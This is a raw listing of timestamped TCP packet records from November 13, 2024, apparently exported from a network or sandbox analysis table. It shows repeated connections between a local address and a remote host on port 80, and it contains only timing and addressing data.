                                                                  Nov 13, 2024 10:52:36.052908897 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.052985907 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.053034067 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.054101944 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.054291010 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.054905891 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.054919004 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.054924965 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.056119919 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.056782007 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.056905985 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.057102919 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.057117939 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.058147907 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.101469040 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:44.534466982 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:45.022811890 CET4999180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:45.027585983 CET804999194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:45.027695894 CET4999180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:45.027837992 CET4999180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:45.028214931 CET4999180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:45.032596111 CET804999194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:45.033027887 CET804999194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:53.502155066 CET804999194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:53.502274036 CET4999180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:53.502346992 CET4999180192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:53.507162094 CET804999194.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.227046013 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.231996059 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.232132912 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.232328892 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.232878923 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.237102985 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237184048 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.237924099 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237941980 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237951994 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237962008 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237972021 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237981081 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.237996101 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.237997055 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.238006115 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.238015890 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.238018036 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.238042116 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.238068104 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.242103100 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.242171049 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.242989063 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.242999077 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.243056059 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.243098021 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.243108034 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.243118048 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.243140936 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.243156910 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.243247986 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.243345022 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.285510063 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.285809040 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.337508917 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.337724924 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.385427952 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.385556936 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.433446884 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.433687925 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.481544971 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.481666088 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.529558897 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.529674053 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.581564903 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.581662893 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.633513927 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.633583069 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.685445070 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.685528040 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.737565994 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.737648964 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.789505959 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.789573908 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.841475010 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.841537952 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.889516115 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.889621973 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.937401056 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.937526941 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:54.985547066 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:54.985635996 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.038336039 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.038461924 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.089607954 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.089818001 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.137362957 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.137449980 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.185391903 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.185465097 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.233566046 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.233763933 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.281488895 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.281614065 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.329468966 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.329544067 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.381556988 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.381623983 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.429615974 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.429753065 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.477597952 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.477706909 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.525533915 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.525614977 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.573434114 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.573561907 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.621594906 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.621685982 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.677459955 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.677567959 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.725487947 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.725559950 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.777553082 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.777690887 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.829472065 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.829603910 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.877526045 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.877774000 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.925498009 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.925551891 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:55.973539114 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:55.973592997 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.021541119 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.021593094 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.069480896 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.069590092 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.117418051 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.117660999 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.169452906 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.169534922 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.217442989 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.217627048 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.265500069 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.265836000 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.317374945 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.317738056 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.369534016 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.369688988 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.417561054 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.417673111 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.465487957 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.465553045 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.514029980 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.514075041 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.565535069 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.565593004 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.613529921 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.613651991 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.661660910 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.661768913 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.709578037 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.709652901 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.758109093 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.758183956 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.809473991 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.809636116 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.858177900 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.858290911 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.905467987 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.905580997 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:56.959331989 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:56.959547043 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.009439945 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.009650946 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.057507992 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.057714939 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.109541893 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.109776020 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.157696009 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.157896996 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.205784082 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.206002951 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.253516912 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.253690958 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.305414915 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.305509090 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.354417086 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.354486942 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.401827097 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.401894093 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.449636936 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.449724913 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.502360106 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.502556086 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.553622961 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.553780079 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.601571083 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.601638079 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.653528929 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.653594971 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.702864885 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.702958107 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.749846935 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.749910116 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.797462940 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.797635078 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.845446110 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.845544100 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.893412113 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.893517971 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.941416025 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.941483021 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:57.989465952 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:57.989542007 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.037410975 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.037539005 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.089685917 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.089756012 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.137644053 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.137706041 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.185705900 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.185774088 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.233638048 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.233694077 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.281461000 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.281553984 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.333602905 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.333772898 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.381572962 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.381661892 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.429517984 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.429610014 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.477633953 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.477716923 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.525602102 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.525659084 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.573492050 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.573586941 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.621551991 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.621678114 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.673515081 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.673629045 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.725478888 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.725862026 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.773499966 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.773597956 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.821554899 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.821858883 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.873406887 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.873543978 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.921489954 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.921555996 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:58.973525047 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:58.973772049 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.021500111 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.021728039 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.069555044 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.069664001 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.117501020 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.117815971 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.165580988 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.165715933 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.217536926 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.217647076 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.265547991 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.265645027 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.313462019 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.313553095 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.361546993 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.361720085 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.409451008 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.409641027 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.457463980 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.457516909 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.505482912 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.505590916 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.557445049 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.557578087 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.605403900 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.605472088 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.653419018 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.653498888 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.701397896 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.701544046 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.749521017 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.749593019 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.797494888 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.797555923 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.849648952 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.849741936 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.897454977 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.897650003 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.945554972 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.945637941 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:59.993530035 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:59.993717909 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.045618057 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.045743942 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.097731113 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.097937107 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.145565987 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.145637035 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.193582058 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.193769932 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.245620012 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.245711088 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.293529987 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.293649912 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.341623068 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.341741085 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.393394947 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.393626928 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.441620111 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.441677094 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.493417025 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.493477106 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.541440964 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.541620970 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.589370012 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.589622021 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.637434006 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.637567997 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.685499907 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.685580969 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.733589888 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.733757973 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.785691023 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.785770893 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.837682962 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.837781906 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.889483929 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.889596939 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.937545061 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.937666893 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:00.985372066 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:00.985531092 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.033477068 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.033534050 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.085489988 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.085542917 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.134444952 CET805001094.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:53:01.134520054 CET5001080192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:53:01.181757927 CET805001094.158.244.69192.168.2.4
